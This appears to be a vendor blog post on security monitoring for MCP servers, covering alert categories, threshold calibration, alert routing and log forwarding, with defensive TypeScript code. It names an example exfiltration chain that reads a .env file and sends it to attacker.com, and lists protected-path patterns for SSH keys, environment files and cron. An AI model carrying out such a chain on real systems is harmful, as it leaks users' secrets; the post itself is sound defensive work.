MCP Server Security Monitoring and Alerting: What to Alert On, Threshold Calibration, and How to Avoid Alert Fatigue

Most MCP servers log nothing beyond a startup message. The ones that do log usually emit raw error stacks — the wrong signal for security operations. Here is a practical framework: four alert categories, how to calibrate thresholds against real traffic, how to route alerts to the right team, and what SkillAudit checks when it grades your observability posture.

Published 2026-06-14 · 3,400 words

Why MCP monitoring is different from API monitoring

Traditional API monitoring focuses on latency, error rate, and throughput. These metrics tell you when something is broken. MCP server security monitoring needs to answer a different question: is the server being used in ways its authors didn't intend?

Two properties make MCP servers unusual from a monitoring perspective:

1. The caller is an LLM agent, not a human. A human clicking a UI generates ~1–5 API calls per interaction. An LLM agent planning a multi-step task can generate 50–200 tool calls in a single session. Burst traffic that looks like an attack in a traditional API may be a normal agentic loop. Your thresholds need to account for this.

2. Tool calls compose into emergent behaviors. A single call to read_file is benign. A single call to fetch_url is benign. A sequence of read_file(.env) → fetch_url(attacker.com, body=file_content) is a data exfiltration attack — but no individual call raises an alarm if you only look at calls in isolation. Security monitoring for MCP servers must track sessions and sequences, not just individual requests.

The SkillAudit observability axis checks for three things: whether structured security events are emitted (not just generic errors), whether the log format is injection-safe (JSON, not string concatenation), and whether logs are forwarded to an append-only external sink rather than staying on the same host being audited. Servers that emit security events only as unstructured strings default to a MEDIUM finding on the observability sub-score; servers with no security event logging at all receive a HIGH finding.

The four alert categories

Start with four categories. Every alert in your MCP server should map to one of them. If it doesn't, question whether it belongs in a security alert at all.

Category 1

Authentication and authorization failures

Failed token validation, expired credentials, IDOR attempts — signals that an entity is trying to access something it shouldn't

Auth failures are the most reliable security signal because they represent a hard system boundary being tested. Every failed auth check should emit a structured event with: caller identity (or the value that was presented as identity if verification failed), the tool being requested, the resource being accessed, the specific failure reason (expired, missing, invalid format, revoked), and the caller's session state (first failure or Nth in a window).

Alert thresholds:

P0 (page immediately): 3 or more auth failures from the same caller within 30 seconds. This pattern usually indicates credential stuffing or a replay attack.
P1 (alert within 5 minutes): Any IDOR attempt, meaning a caller presents a valid token but requests a resource that belongs to a different caller.
INFO (log only, review in the weekly report): Isolated single auth failures. These usually come from a misconfigured client, not an attack.

// Structured auth failure event
log.security({
  event: 'auth_failure',
  reason: 'token_expired',           // expired | missing | invalid | revoked | idor
  callerId: hash(presentedCallerId), // hashed — never log raw bearer token
  toolRequested: 'read_file',
  resourceId: args.path,
  sessionFailureCount: session.authFailures,
  sessionAge: Date.now() - session.startedAt,
  ts: Date.now()
});
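
The P0 threshold above implies a per-caller sliding window that feeds the sessionFailureCount field. A minimal sketch of one way to keep that window follows; the class name AuthFailureWindow and its method are hypothetical, and the defaults simply mirror the 3-failures-in-30-seconds rule.

```typescript
// Hypothetical helper: keeps recent auth-failure timestamps per hashed caller ID.
class AuthFailureWindow {
  private failures = new Map<string, number[]>();
  private readonly maxFailures: number;
  private readonly windowMs: number;

  constructor(maxFailures: number = 3, windowMs: number = 30_000) {
    this.maxFailures = maxFailures; // P0 threshold from the list above
    this.windowMs = windowMs;       // 30-second window
  }

  // Records one failure; returns true once the caller reaches the burst threshold.
  record(callerHash: string, now: number = Date.now()): boolean {
    const cutoff = now - this.windowMs;
    const recent = (this.failures.get(callerHash) ?? []).filter(t => t > cutoff);
    recent.push(now);
    this.failures.set(callerHash, recent);
    return recent.length >= this.maxFailures;
  }
}

const authWindow = new AuthFailureWindow();
const t0 = 1_000_000;
const first = authWindow.record('caller-a', t0);           // false
const second = authWindow.record('caller-a', t0 + 10_000); // false
const third = authWindow.record('caller-a', t0 + 20_000);  // true: 3 failures inside 30 s
const later = authWindow.record('caller-a', t0 + 60_000);  // false: earlier failures expired
```

Passing the timestamp in as a parameter keeps the window testable without mocking the clock. A production version would also need to evict idle callers so the map does not grow without bound.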

The IDOR case deserves special handling. When a caller presents a valid token but the resource ID belongs to a different caller, log the resource owner's hashed ID (not their raw identifier) alongside the caller's hashed ID. This creates a correlation path for incident investigation without logging PII in the alert.
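
As an illustration of the IDOR event described above, the sketch below hashes both identifiers before they reach the log. The helper names hashId and buildIdorEvent and the resourceOwnerId field are assumptions, not part of any existing schema; plain SHA-256 is used for brevity.

```typescript
import { createHash } from 'node:crypto';

// Hypothetical helper: one-way hash so raw identifiers never reach the log.
function hashId(id: string): string {
  return createHash('sha256').update(id).digest('hex');
}

// Builds an IDOR event carrying both hashed IDs for later correlation.
function buildIdorEvent(callerId: string, ownerId: string, tool: string, now: number = Date.now()) {
  return {
    event: 'auth_failure',
    reason: 'idor',
    callerId: hashId(callerId),
    resourceOwnerId: hashId(ownerId), // assumed field name
    toolRequested: tool,
    ts: now,
  };
}

const idorEvent = buildIdorEvent('user-123', 'user-456', 'read_file', 1_700_000_000_000);
```

If caller IDs are short or guessable, an unsalted hash can be reversed by brute force. A keyed hash (for example createHmac with a secret held outside the log pipeline) is a reasonable alternative in that case.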

Category 2

Anomalous tool call patterns

Tool call sequences that deviate from normal agentic behavior — burst patterns, cross-category chains, off-hours activity

This is the hardest category to calibrate because "anomalous" depends on what normal looks like for your server. But four pattern classes are reliable signals across most MCP servers:

Burst detection: More than N calls of the same tool within T seconds from the same caller. The challenge is that LLM agents legitimately generate bursts during planning loops. The key differentiator is whether the burst contains unique arguments or the same argument repeated. A planning loop calling list_directory 10 times with different paths is normal. The same call 10 times with the same path is a loop bug or a probe.

Cross-category chain detection: A retrieval tool followed immediately by an external-network tool is the canonical exfiltration chain signature. Detecting it requires tagging each tool with its effect class (retrieval / mutation / external) and maintaining a per-session call log. The chain [retrieval, retrieval, external] within a 30-second window should trigger a P1 alert unless the caller has been explicitly granted the allow:retrieval-to-external-chain permission.

Off-hours activity: If your users are internal and primarily work 9–5, a cluster of tool calls at 3 AM is suspicious. This is easy to alert on but requires knowing your traffic baseline. Do not enable this alert until you have two weeks of normal traffic data.

Tool enumeration: A caller that invokes every tool your server exposes exactly once, in quick succession, is probing your surface. This is a reconnaissance pattern. The signature: N distinct tools called within 60 seconds with minimal arguments — args that look like the minimum required to avoid a validation error rather than real use.
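
The enumeration signature can be approximated by counting distinct tools inside the 60-second window. The sketch below is a simplification under stated assumptions: the names CallRecord and looksLikeEnumeration are hypothetical, and it does not attempt the "minimal arguments" check, which depends on each tool's schema.

```typescript
interface CallRecord { tool: string; ts: number; }

// Returns true when at least `minDistinct` different tools were called inside the window.
function looksLikeEnumeration(
  calls: CallRecord[],
  now: number,
  minDistinct: number,        // assumption: set near the number of tools the server exposes
  windowMs: number = 60_000,  // 60-second window from the text
): boolean {
  const recentTools = calls.filter(c => now - c.ts <= windowMs).map(c => c.tool);
  return new Set(recentTools).size >= minDistinct;
}

const probe: CallRecord[] = ['read_file', 'write_file', 'fetch_url', 'list_directory', 'run_query']
  .map((tool, i) => ({ tool, ts: 1_000 + i * 2_000 }));
const flagged = looksLikeEnumeration(probe, 10_000, 5); // true: 5 distinct tools within 60 s
```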

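// Cross-category chain detection
type EffectClass = 'retrieval' | 'mutation' | 'external';
interface ToolCall { tool: string; effectClass: EffectClass; ts: number; }

// Assumes callLog is in chronological order (oldest first)
function isExfiltrationPattern(callLog: ToolCall[]): boolean {
  const now = Date.now();
  const recent = callLog.filter(c => now - c.ts < 30_000);
  // Order matters: the external call must come after a retrieval
  const firstRetrieval = recent.findIndex(c => c.effectClass === 'retrieval');
  const externalAfterRetrieval = firstRetrieval !== -1 &&
    recent.slice(firstRetrieval + 1).some(c => c.effectClass === 'external');
  const hasMutation = recent.some(c => c.effectClass === 'mutation');
  // retrieval followed by external with no mutation = potential exfiltration
  return externalAfterRetrieval && !hasMutation;
}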

// Run after each tool call that completes successfully
if (isExfiltrationPattern(session.callLog)) {
  log.security({
    event: 'chain_guard_alert',
    pattern: 'retrieval_to_external',
    callSequence: session.callLog.slice(-10).map(c => c.tool),
    ts: Date.now()
  });
}
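
The burst heuristic described earlier in this category, varied arguments versus one argument repeated, can be sketched the same way. The names BurstCall and classifyBurst, the argsKey field (for example a hash of the serialized arguments), and the defaults of 10 calls in 10 seconds are all assumptions to be replaced with values from your own baseline.

```typescript
interface BurstCall { tool: string; argsKey: string; ts: number; }
type BurstVerdict = 'none' | 'varied_burst' | 'repeated_burst';

function classifyBurst(
  calls: BurstCall[],
  tool: string,
  now: number,
  minCalls: number = 10,      // assumed N
  windowMs: number = 10_000,  // assumed T
): BurstVerdict {
  const recent = calls.filter(c => c.tool === tool && now - c.ts <= windowMs);
  if (recent.length < minCalls) return 'none';
  const uniqueArgs = new Set(recent.map(c => c.argsKey)).size;
  // One argument set repeated: loop bug or probe. Varied arguments: likely a planning loop.
  return uniqueArgs === 1 ? 'repeated_burst' : 'varied_burst';
}

const burstNow = 100_000;
const varied: BurstCall[] = [];
const repeated: BurstCall[] = [];
for (let i = 0; i < 10; i++) {
  varied.push({ tool: 'list_directory', argsKey: `/src/dir${i}`, ts: burstNow - i * 500 });
  repeated.push({ tool: 'list_directory', argsKey: '/src', ts: burstNow - i * 500 });
}
const variedVerdict = classifyBurst(varied, 'list_directory', burstNow);     // 'varied_burst'
const repeatedVerdict = classifyBurst(repeated, 'list_directory', burstNow); // 'repeated_burst'
```

Only the repeated_burst verdict would normally feed an alert; varied_burst is worth logging for baseline purposes.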

Category 3

Data volume and exfiltration signals

High-volume read operations, large response payloads, and external-network calls that correlate with retrieval spikes

Tool call count alone doesn't capture exfiltration risk — a server that returns 1 KB per call is different from one that streams multi-MB files. Volume-based alerts add a second axis that catches exfiltration attempts that stay under call-count thresholds by requesting large payloads instead of many calls.

Track three volume metrics per session:

Cumulative response bytes: Total bytes returned to the caller across all tool calls in the session. Alert if this exceeds a ceiling derived from your 99th-percentile session byte volume (establish this from baseline traffic; for most MCP servers serving LLM agents, the 99th percentile will be 1–10 MB per session).
Single-call response size: If one tool call returns more than your configured ceiling (e.g., 5 MB), alert regardless of session total. A single read_file call that returns 5 MB of data is almost certainly reading the wrong file or responding to an oversized argument.
External call byte volume: Total bytes sent in outbound requests from tools that make external network calls. A small inbound query producing a large outbound payload is a classic exfiltration indicator.

class SessionVolumeGuard {
  private inboundBytes = 0;
  private outboundBytes = 0;
  private readonly INBOUND_CEILING = 10 * 1024 * 1024;  // 10 MB
  private readonly OUTBOUND_CEILING = 1 * 1024 * 1024;  // 1 MB

  recordResponse(toolName: string, responseBytes: number) {
    this.inboundBytes += responseBytes;
    if (responseBytes > 5 * 1024 * 1024) {
      log.security({ event: 'large_single_response', tool: toolName, bytes: responseBytes, ts: Date.now() });
    }
    if (this.inboundBytes > this.INBOUND_CEILING) {
      log.security({ event: 'session_volume_ceiling', totalBytes: this.inboundBytes, ts: Date.now() });
    }
  }

  recordOutbound(toolName: string, bodyBytes: number) {
    this.outboundBytes += bodyBytes;
    if (this.outboundBytes > this.OUTBOUND_CEILING) {
      log.security({ event: 'outbound_volume_ceiling', tool: toolName, totalBytes: this.outboundBytes, ts: Date.now() });
    }
  }
}

Volume alerts have a high false-positive rate in servers that legitimately process large files. Before enabling the session ceiling alert, collect at least two weeks of production response-size data (the same baseline period used for threshold calibration) and set the threshold at the 99th percentile plus 50% headroom. This catches true anomalies while suppressing the routine heavy-user traffic that would otherwise dominate your alert queue.

Category 4

Configuration and filesystem tampering signals

Write operations on sensitive paths, permission scope escalation, and server configuration changes at runtime

If your MCP server exposes any write tools — filesystem, database, message queue — those write operations are the highest-risk surface in your server. Most write tools legitimately write to application data paths. The sensitive cases are writes to infrastructure-level paths that the tool wasn't designed to touch.

Define a set of protected path patterns per tool. Any write to a protected pattern should be blocked before the write completes and emit a P0 alert:

const PROTECTED_PATH_PATTERNS = [
  /\.env/,           // environment files
  /\.git\//,         // git internals
  /\.ssh\//,         // SSH keys
  /\/etc\//,         // system config
  /\.github\//,      // CI/CD workflows
  /cron/i,           // cron job files
  /\.(sh|bash|zsh|py|rb)$/, // executable scripts
  /node_modules\//,  // dependency tree
];

function isProtectedPath(path: string): boolean {
  return PROTECTED_PATH_PATTERNS.some(p => p.test(path));
}

// In write_file handler — check before any write
if (isProtectedPath(args.path)) {
  log.security({
    event: 'write_to_protected_path',
    path: args.path,              // log the path — not the content
    callerId: session.callerId,
    ts: Date.now()
  });
  throw new ToolError('FORBIDDEN', 'Write target is not allowed');
}

The block-before-write pattern matters here. Log the attempt and throw before touching the filesystem. An alert that fires after the write has succeeded is observability, not security.
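
Pattern checks on the raw argument are easier to reason about when the path is normalized first. The sketch below is one possible hardening step, not part of the handler above: checkWritePath and the workspace root are hypothetical, the pattern list is a subset of the one shown earlier, and symlinks are not resolved.

```typescript
import { posix } from 'node:path';

const PROTECTED_SUBSET = [/\.env/, /\.git\//, /\.ssh\//]; // subset of the patterns above

type PathVerdict = 'ok' | 'outside_root' | 'protected';

// Resolves the requested path against an absolute workspace root (no trailing slash),
// then checks containment before testing the protected patterns.
function checkWritePath(root: string, requested: string): PathVerdict {
  const resolved = posix.resolve(root, requested);
  if (resolved !== root && !resolved.startsWith(root + '/')) return 'outside_root';
  return PROTECTED_SUBSET.some(p => p.test(resolved)) ? 'protected' : 'ok';
}

const okVerdict = checkWritePath('/srv/data', 'notes/todo.md');                    // 'ok'
const escapeVerdict = checkWritePath('/srv/data', '../../etc/passwd');             // 'outside_root'
const hiddenVerdict = checkWritePath('/srv/data', 'a/../.ssh/authorized_keys');    // 'protected'
```

Either non-ok verdict would be logged and rejected before the write, in keeping with the block-before-write rule.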

A second class of tampering signal applies if your server exposes any tool that modifies its own configuration — changing rate limits, updating allowed scopes, adjusting feature flags. These operations should always require a second authentication factor beyond the standard session token (a separate admin token or an explicit confirmation parameter) and always emit a P1 alert.

Threshold calibration: how to find the right numbers

Alert thresholds are where most MCP server monitoring programs fail. Thresholds set too low create an alert storm that on-call engineers learn to ignore. Thresholds set too high miss real attacks. The right approach is data-driven calibration from your own baseline, not numbers from a blog post.

Step 1 — Establish a baseline (2 weeks minimum)

Deploy structured logging for a fortnight before enabling any alerts. Log every tool call with: caller ID hash, tool name, response bytes, latency, session age. Do not alert on anything during this period. You are building the histogram of normal behavior.

Step 2 — Calculate percentile thresholds

For each metric you plan to alert on, compute p99 from the baseline. Your alert threshold = p99 × 1.5. The 1.5× headroom absorbs legitimate traffic spikes (Monday morning rush, a large automated workflow) without triggering on noise.
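
The arithmetic in Step 2 is small enough to sketch directly. This version uses the nearest-rank definition of a percentile, which is one of several common definitions; the function names are hypothetical.

```typescript
// Nearest-rank percentile over a baseline sample (p between 0 and 100).
function percentile(samples: number[], p: number): number {
  if (samples.length === 0) throw new Error('baseline is empty');
  const sorted = [...samples].sort((a, b) => a - b);
  const rank = Math.max(Math.ceil((p * sorted.length) / 100), 1);
  return sorted[rank - 1];
}

// Alert threshold = p99 x headroom (1.5 by default, as in Step 2).
function alertThreshold(samples: number[], headroom: number = 1.5): number {
  return percentile(samples, 99) * headroom;
}

// Toy baseline: 100 sessions with 1..100 tool calls each.
const baseline: number[] = [];
for (let i = 1; i <= 100; i++) baseline.push(i);
const threshold = alertThreshold(baseline); // p99 = 99, threshold = 148.5
```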

Step 3 — Segment by caller type

LLM agents generate dramatically more traffic than human-driven integrations. If you can distinguish caller types (by token claim, by client identifier in the auth header, by call-rate signature), use per-segment thresholds. A threshold calibrated on mixed traffic will be too high for humans and too low for agents.
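
Per-segment calibration is the same calculation run once per caller type. The sketch below assumes each baseline session has already been labeled as agent or human; the type and function names are hypothetical, and the sample numbers are made up for illustration.

```typescript
type CallerType = 'agent' | 'human';
interface SessionSample { callerType: CallerType; toolCalls: number; }

// Nearest-rank 99th percentile; assumes a non-empty array.
function p99(values: number[]): number {
  const sorted = [...values].sort((a, b) => a - b);
  const rank = Math.max(Math.ceil((99 * sorted.length) / 100), 1);
  return sorted[rank - 1];
}

// Groups samples by caller type and computes p99 x headroom for each group.
function thresholdsBySegment(samples: SessionSample[], headroom: number = 1.5): Map<CallerType, number> {
  const groups = new Map<CallerType, number[]>();
  for (const s of samples) {
    const bucket = groups.get(s.callerType) ?? [];
    bucket.push(s.toolCalls);
    groups.set(s.callerType, bucket);
  }
  const result = new Map<CallerType, number>();
  groups.forEach((values, type) => result.set(type, p99(values) * headroom));
  return result;
}

const segmentSamples: SessionSample[] = [
  ...[1, 2, 3, 4, 5].map(n => ({ callerType: 'human' as CallerType, toolCalls: n })),
  ...[50, 100, 150, 200].map(n => ({ callerType: 'agent' as CallerType, toolCalls: n })),
];
const segmentThresholds = thresholdsBySegment(segmentSamples);
// human: 5 * 1.5 = 7.5, agent: 200 * 1.5 = 300
```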

Step 4 — Review and re-tune after 30 days

After your first 30 days of production alerts, audit the false-positive rate. If more than 20% of P1 alerts resolve as false positives, your thresholds are too sensitive — raise them by 25%. If you have zero P1 alerts and no incidents, your thresholds may be too high — lower by 25%. Re-tune every 30 days until your false-positive rate is under 10%.
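
The review rule can be written down as a small function so the adjustment is applied consistently each cycle. This is a sketch of the rule as stated; the AlertReview shape and the retune name are hypothetical, and the case of zero alerts with known incidents is left unchanged because the rule above does not cover it.

```typescript
interface AlertReview {
  totalP1: number;        // P1 alerts fired in the review period
  falsePositives: number; // of those, how many resolved as false positives
  incidents: number;      // confirmed incidents in the same period
}

function retune(threshold: number, review: AlertReview): number {
  if (review.totalP1 === 0) {
    // No alerts and no incidents: threshold may be too high, lower by 25%.
    return review.incidents === 0 ? threshold * 0.75 : threshold;
  }
  const fpRate = review.falsePositives / review.totalP1;
  // More than 20% false positives: too sensitive, raise by 25%.
  return fpRate > 0.2 ? threshold * 1.25 : threshold;
}

const raised = retune(100, { totalP1: 10, falsePositives: 3, incidents: 0 });  // 125
const lowered = retune(100, { totalP1: 0, falsePositives: 0, incidents: 0 });  // 75
const kept = retune(100, { totalP1: 10, falsePositives: 1, incidents: 0 });    // 100
```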

Alert routing: who gets what

An alert that pages the wrong person, or pages everyone, will be ignored. Map alert severity to team before you deploy monitoring:

Severity	Alert category	Route to	SLA
P0	Auth failure burst (≥3 failures in 30s from same caller)	On-call security engineer + server owner	15 minutes to acknowledge
P0	Write to protected path (blocked)	On-call security engineer + server owner	15 minutes to acknowledge
P1	Cross-category chain alert (retrieval → external without chain scope)	Server owner + security team Slack channel	4 hours to investigate
P1	IDOR attempt (valid token, wrong resource)	Server owner + security team Slack channel	4 hours to investigate
P1	Session byte ceiling exceeded	Server owner	4 hours to investigate
P2	Tool enumeration pattern	Security team daily digest	24 hours
P2	Off-hours activity	Security team daily digest	24 hours
INFO	Single auth failure	Log only — no alert	Review in weekly report
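
Keeping the routing table in code next to the event definitions makes it harder for the two to drift apart. The sketch below encodes the rows above; event names that do not appear in the earlier examples (auth_failure_burst, idor_attempt, tool_enumeration, off_hours_activity, single_auth_failure) and the target labels are assumptions.

```typescript
type Severity = 'P0' | 'P1' | 'P2' | 'INFO';
interface Route { severity: Severity; targets: string[]; sla: string; }

const ROUTES: Record<string, Route> = {
  auth_failure_burst:      { severity: 'P0', targets: ['security-oncall', 'server-owner'], sla: '15 minutes to acknowledge' },
  write_to_protected_path: { severity: 'P0', targets: ['security-oncall', 'server-owner'], sla: '15 minutes to acknowledge' },
  chain_guard_alert:       { severity: 'P1', targets: ['server-owner', 'security-channel'], sla: '4 hours to investigate' },
  idor_attempt:            { severity: 'P1', targets: ['server-owner', 'security-channel'], sla: '4 hours to investigate' },
  session_volume_ceiling:  { severity: 'P1', targets: ['server-owner'], sla: '4 hours to investigate' },
  tool_enumeration:        { severity: 'P2', targets: ['security-digest'], sla: '24 hours' },
  off_hours_activity:      { severity: 'P2', targets: ['security-digest'], sla: '24 hours' },
  single_auth_failure:     { severity: 'INFO', targets: [], sla: 'weekly report' },
};

// Unknown events fall back to the daily digest rather than being dropped (an assumption).
function routeFor(eventName: string): Route {
  return ROUTES[eventName] ?? { severity: 'P2', targets: ['security-digest'], sla: '24 hours' };
}

const chainRoute = routeFor('chain_guard_alert'); // P1, server owner + security channel
```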

Alert fatigue is a security vulnerability. If your on-call rotation is receiving more than 5 P1 alerts per day that resolve as false positives, the alert program is producing negative security value — engineers stop looking, and real attacks get lost in noise. Track your false-positive rate as a first-class metric and treat a high false-positive rate as a P2 incident.

Integration with SIEM and incident response

Structured JSON logs are useful on their own, but they become powerful when forwarded to a SIEM (Splunk, Elastic Security, Datadog SIEM, or an open-source alternative like Wazuh). The structured log schema from earlier in this post is designed to be SIEM-friendly: every event has a consistent event field for filtering, a consistent ts field for time-series analysis, and hashed identifiers for correlation without PII.

Three SIEM use cases that are worth wiring up immediately:

Correlation across multiple MCP servers: If your infrastructure includes multiple MCP servers, a single SIEM receiving logs from all of them can detect attacks that hop between servers — a caller that fails auth on Server A and immediately tries Server B with the same credential is a credential-stuffing attack across your entire fleet, invisible if you only look at per-server logs.

Retrospective investigation: After an incident, you need to answer "what did this caller do in the 30 minutes before the alert fired?" SIEM with structured logs answers this in seconds. A server that only logs to stdout with raw error messages answers it in hours of log parsing, if at all.

Baseline drift detection: SIEM can build a rolling model of normal tool call patterns per caller and alert when a caller's behavior diverges significantly from their own baseline — a more precise signal than fixed thresholds for high-volume callers whose usage patterns are complex.
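
SIEM products implement their own behavioral models, so the following is only an illustration of the idea behind baseline drift: compare a caller's current activity against that caller's own history. The isDrift name, the z-score approach, and the cutoff of 3 standard deviations are assumptions.

```typescript
// Flags a value more than `k` sample standard deviations above the caller's own mean.
function isDrift(history: number[], current: number, k: number = 3): boolean {
  if (history.length < 2) return false; // not enough data to model this caller
  const mean = history.reduce((a, b) => a + b, 0) / history.length;
  const variance = history.reduce((a, b) => a + (b - mean) ** 2, 0) / (history.length - 1);
  const std = Math.sqrt(variance);
  if (std === 0) return current > mean; // flat history: any increase is a deviation
  return (current - mean) / std > k;
}

// Daily tool-call counts for one caller over five days.
const callerHistory = [40, 42, 38, 41, 39];
const spike = isDrift(callerHistory, 120); // true
const normalDay = isDrift(callerHistory, 43); // false
```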

Log forwarding that survives an incident

One detail that matters operationally: if your logs are stored only on the MCP server's own host, an attacker who compromises the server can delete the logs before your investigation begins. Forward logs to an append-only external sink from the moment they are written. The standard pattern:

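import pino from 'pino';
import pinoCloudWatch from 'pino-cloudwatch';

// Two streams: stdout (for local debugging) + external append-only sink
const streams = pino.multistream([
  { stream: process.stdout },
  {
    // Option names here are illustrative; check them against the pino-cloudwatch README
    stream: pinoCloudWatch({
      logGroupName: '/mcp-server/security',
      logStreamName: `security-${process.env.INSTANCE_ID}`,
      // Append-only depends on IAM: the server role must have no delete permission on this log group
    })
  }
]);

// multistream dispatches on the level pino attaches to each write,
// so events go through a logger instead of calling streams.write() directly
const logger = pino(
  { base: undefined, timestamp: false, formatters: { level: () => ({ level: 'security' }) } },
  streams
);

export const log = {
  security: (event: SecurityEvent) => logger.info(event)
};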

The CloudWatch example works for AWS deployments. For other environments: Loki with an append-only log pipeline, an S3 bucket with object lock enabled, or a managed SIEM ingestion endpoint — any option where the server process does not have delete or overwrite access to its own log store.

The three common mistakes

Mistake 1: Logging in the error handler only. If your only security events come from exception handlers, you miss the majority of attack patterns — most successful tool chaining attacks and data exfiltration attempts complete without throwing exceptions. Security events should be emitted after successful calls that match anomaly patterns, not only on failure.

Mistake 2: Including credential values in logs. The most common credential leak in MCP servers is a console.log(process.env) or an error message that includes the full token value. Security event logs should contain hashed caller IDs and argsHash (a SHA-256 of the arguments for correlation) but never the raw argument values, never the raw token, and never env-var values. See the anatomy of a credential leak post for a census of how this goes wrong across the community corpus.

Mistake 3: Alerting on every anomaly equally. Not every alert deserves a page. A server that pages on every single auth failure will create an alert storm every time a client has a stale token. Tiered severity (P0/P1/P2/INFO) with appropriate routing for each tier is what makes alert programs sustainable. Build the tiers before you enable any alerts in production.
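
For Mistake 2, the argsHash field needs a serialization that does not depend on key order, otherwise identical arguments can produce different hashes. A minimal sketch, with stableStringify and argsHash as hypothetical helper names:

```typescript
import { createHash } from 'node:crypto';

// Serializes with sorted object keys so equal argument objects hash identically.
function stableStringify(value: unknown): string {
  if (value === undefined) return 'null';
  if (value === null || typeof value !== 'object') return JSON.stringify(value);
  if (Array.isArray(value)) return '[' + value.map(stableStringify).join(',') + ']';
  const obj = value as Record<string, unknown>;
  const entries = Object.keys(obj).sort().map(k => JSON.stringify(k) + ':' + stableStringify(obj[k]));
  return '{' + entries.join(',') + '}';
}

// SHA-256 of the serialized arguments, for correlation without logging raw values.
function argsHash(args: unknown): string {
  return createHash('sha256').update(stableStringify(args)).digest('hex');
}

const hashA = argsHash({ path: '/srv/data/report.csv', encoding: 'utf8' });
const hashB = argsHash({ encoding: 'utf8', path: '/srv/data/report.csv' });
// hashA === hashB: key order does not change the hash
```

A hash of short or predictable arguments can still be guessed by brute force, so argsHash is a correlation aid rather than a confidentiality guarantee.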

What a monitoring-ready server looks like

After implementing the framework above, a monitoring-ready MCP server has these properties:

Every security-relevant event emits a structured JSON log line with event, ts, hashed caller ID, and relevant context — no raw error strings, no credential values
Auth failures, chain guard blocks, protected-path write attempts, and volume ceiling breaches each have a named event type that maps to an alert rule
A per-session call log tracks tool sequence and effect class for chain detection
Alert thresholds are calibrated from baseline traffic, not from a blog post
Logs forward to an append-only external sink that the server process cannot delete
Alert routing is documented: P0 pages on-call with a 15-minute acknowledgment SLA, P1 goes to the team channel with a 4-hour investigation SLA, and P2 batches to a daily digest

SkillAudit grade impact

The SkillAudit observability sub-score currently contributes to the Security axis. Here is how the monitoring patterns in this post map to findings and grade effects:

HIGH

No structured security event logging at all — tool calls complete with no audit trail. Grade impact: −15 on Security axis. Fix: add the structured event schema from this post to at least auth_failure and chain_guard_alert events.

MEDIUM

Security events emitted as unstructured strings (console.log or stderr) — not parseable by SIEM. Grade impact: −8 on Security axis. Fix: switch to JSON event objects with consistent field names.

MEDIUM

Security events include raw credential values or full env vars. Grade impact: −10 on Credential Exposure axis. Fix: log argsHash instead of raw args; never log process.env or bearer tokens.

WARN

Logs stored locally only — no external forwarding. Grade impact: −5 on Security axis. Fix: add a pino-cloudwatch / pino-loki stream.

WARN

No chain detection logic — session call log not maintained. Grade impact: −5 on Security axis. Fix: add per-session call log with effect class tagging and chain detection after each successful tool call.

A server that implements the full framework from this post — structured events, chain detection, external forwarding, no credential values in logs — will score between 90 and 100 on the Security axis, assuming it already passes the static checks for SSRF and command injection. Monitoring doesn't fix code vulnerabilities, but it does demonstrate operational maturity that directly affects the Maintenance sub-score as well.

Starting point: the minimum viable monitoring setup

If you are starting from zero and need a realistic first step, this is the minimum viable setup that will move your SkillAudit grade and give you genuine security value:

Add one security logger — a thin wrapper around pino that writes JSON to stdout. No configuration beyond JSON.stringify. Do this first — it is ten lines of code.
Instrument two events — auth_failure and chain_guard_alert. These two events catch the majority of active attacks and have clear semantics. Add them before anything else.
Add one alert rule — page on ≥3 auth failures from the same caller in 30 seconds. Set this up in your existing alerting system (PagerDuty, OpsGenie, Slack alert bot). This is your only P0 alert for the first month.
Forward to one external sink — whatever your existing infrastructure uses (CloudWatch, Datadog, Loki). If you have nothing, a free Datadog trial works for the first 30 days.
Review after 30 days — look at the auth failure events. Are there any callers with repeated failures? Any cross-category chains that fired? Tune the chain detection threshold based on what you see.

Everything else in this post is additive on top of this foundation. The minimum viable setup takes 2–4 hours to implement and will surface real security signals within the first week of production traffic.
